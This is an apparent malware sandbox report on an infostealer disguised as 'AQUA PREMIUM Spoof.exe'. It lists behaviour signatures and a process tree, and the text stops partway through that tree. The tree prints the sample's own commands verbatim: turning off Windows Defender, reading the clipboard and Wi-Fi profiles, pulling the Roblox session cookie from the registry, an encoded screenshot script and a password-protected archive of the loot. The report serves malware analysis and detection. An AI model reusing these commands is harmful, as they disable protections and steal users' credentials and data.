Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    93s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/12/2024, 09:03 UTC

General

  • Target

    AQUA PREMIUM Spoof.exe

  • Size

    5.9MB

  • MD5

    47911cfecd3dcd8b505235dd9b187992

  • SHA1

    9c874cead1208b3b77f0ae535d07522629e6e676

  • SHA256

    3aac1ef0cd3825fbb753199f1fe31430f4aba354cc4fb8e7db74b63ac8f7efdf

  • SHA512

    cac06ffeb06e83c2e0a4c98512dde8292c2800a35a4653621e6cdd2877293381ebf7f773456974b4181838e98916ff9a6c6d5ec2ec145398cfddbb2668889eec

  • SSDEEP

    98304:V2De7pzWqe8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDtFMai3lMmg8N:VzNzWKB6yA+KO0WR4iarmg8N

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe
    "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3756
    • C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe
      "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3480
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2140
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3644
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:3984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4848
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:3568
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:4020
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4984
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3300
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3372
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"
              4⤵
              • Views/modifies file attributes
              PID:4760
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3636
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3476
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4104
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:5016
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4396
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2396
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:1656
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:708
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:4068
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5040
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:2096
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:4544
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:680
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:1884
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:2024
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:3208
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:3908
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:2912
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:324
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:1152
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:920
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4392
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lleudvyv\lleudvyv.cmdline"
                                  5⤵
                                    PID:3980
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABE0.tmp" "c:\Users\Admin\AppData\Local\Temp\lleudvyv\CSC6DE91CB8B0BE412E80AACD85DF3CDF2C.TMP"
                                      6⤵
                                        PID:3248
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2380
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:456
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:2140
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:320
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:4676
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4772
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                            3⤵
                                              PID:4956
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:4628
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:3972
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:3408
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:3372
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:2088
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      3⤵
                                                        PID:1240
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          4⤵
                                                          • Enumerates processes with tasklist
                                                          PID:4092
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:3724
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:4648
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:2064
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3472
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:3528
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  4⤵
                                                                    PID:2140
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4612
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                  3⤵
                                                                    PID:3344
                                                                    • C:\Windows\system32\getmac.exe
                                                                      getmac
                                                                      4⤵
                                                                        PID:1172
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\aPqap.zip" *"
                                                                      3⤵
                                                                        PID:5060
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI37562\rar.exe
